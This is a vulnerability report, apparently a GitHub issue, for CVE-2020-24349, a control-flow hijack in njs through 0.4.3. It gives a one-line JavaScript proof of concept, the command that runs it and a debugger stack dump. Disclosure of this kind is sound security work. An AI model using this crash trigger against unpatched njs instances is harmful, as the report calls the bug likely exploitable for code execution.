Headline
CVE-2020-24349: Control flow hijack in njs_value_property · Issue #324 · nginx/njs
njs through 0.4.3, used in NGINX, allows control-flow hijack in njs_value_property in njs_value.c. NOTE: the vendor considers the issue to be “fluff” in the NGINX use case because there is no remote attack surface.
Version:0.4.2, git commit 32a70c899c1f136fbc3f97fcc050d59e0bd8c6a5
This bug is likely exploitable.
POC:
function a() { new Uint32Array(this[8] = a) return Array } JSON.parse("[1, 2, []]", a)
cmd: njs poc.js
Stack dump:
#0 0x0000623000000cc0 in ?? ()
#1 0x00000000004f2b8a in njs_value_property (vm=<optimized out>, value=<optimized out>, key=<optimized out>,
retval=<optimized out>) at src/njs_value.c:1033
#2 0x000000000056b75a in njs_object_length (vm=0x623000000100, value=0x6190000011d0, length=<optimized out>)
at src/njs_object.c:2638
#3 0x000000000073589f in njs_typed_array_constructor (vm=<optimized out>, args=<optimized out>,
nargs=<optimized out>, magic=<optimized out>) at src/njs_typed_array.c:97
#4 0x00000000005ff82f in njs_function_native_call (vm=vm@entry=0x623000000100) at src/njs_function.c:707
#5 0x0000000000507612 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffff9c28)
at /home/yongheng/njs/src/njs_function.h:172
#6 njs_vmcode_interpreter (vm=0x623000000100, pc=0x616000000140 "\v\002\276\276\276\276\276\276$")
at src/njs_vmcode.c:778
#7 0x00000000005feecc in njs_function_lambda_call (vm=vm@entry=0x623000000100) at src/njs_function.c:677
#8 0x00000000005fdd24 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffffa900)
at /home/yongheng/njs/src/njs_function.h:175
#9 njs_function_call2 (vm=<optimized out>, function=<optimized out>, this=<optimized out>, args=<optimized out>,
nargs=<optimized out>, retval=<optimized out>, ctor=<optimized out>) at src/njs_function.c:582
#10 0x00000000005e6584 in njs_function_apply (vm=0x623000000100, function=0x7fffffff9c20, args=<optimized out>,
nargs=0x3, retval=0x7fffffffac60) at /home/yongheng/njs/src/njs_function.h:193
#11 njs_json_parse_iterator_call (vm=0x623000000100, parse=0x7fffffffac60, state=<optimized out>)
at src/njs_json.c:1015
#12 njs_json_parse_iterator (vm=0x623000000100, parse=0x7fffffffac60, object=0xffffffff59a) at src/njs_json.c:971
#13 njs_json_parse (vm=<optimized out>, args=<optimized out>, nargs=0xffffacb8, unused=<optimized out>)
at src/njs_json.c:167
#14 0x00000000005ff82f in njs_function_native_call (vm=vm@entry=0x623000000100) at src/njs_function.c:707
#15 0x0000000000507612 in njs_function_frame_invoke (vm=0x623000000100, retval=0x7fffffff9c28)
at /home/yongheng/njs/src/njs_function.h:172
#16 njs_vmcode_interpreter (vm=0x623000000100, pc=0x6250000417a8 "\v\002\276\276\276\276\276\276!")
at src/njs_vmcode.c:778
#17 0x00000000004feb4c in njs_vm_start (vm=vm@entry=0x623000000100) at src/njs_vm.c:500
#18 0x00000000004c8f02 in njs_process_script (opts=<optimized out>, console=0x1307c60 <njs_console>,
script=<optimized out>) at src/njs_shell.c:843
#19 0x00000000004c68cf in njs_process_file (opts=0x7fffffffe1f0, vm_options=0x7fffffffe250) at src/njs_shell.c:562
#20 main (argc=<optimized out>, argv=<optimized out>) at src/njs_shell.c:286
#21 0x00007ffff6969b97 in __libc_start_main (main=0x4c3cc0 <main>, argc=0x2, argv=0x7fffffffe4c8,
init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4b8)
at ../csu/libc-start.c:310
#22 0x000000000041c08a in _start ()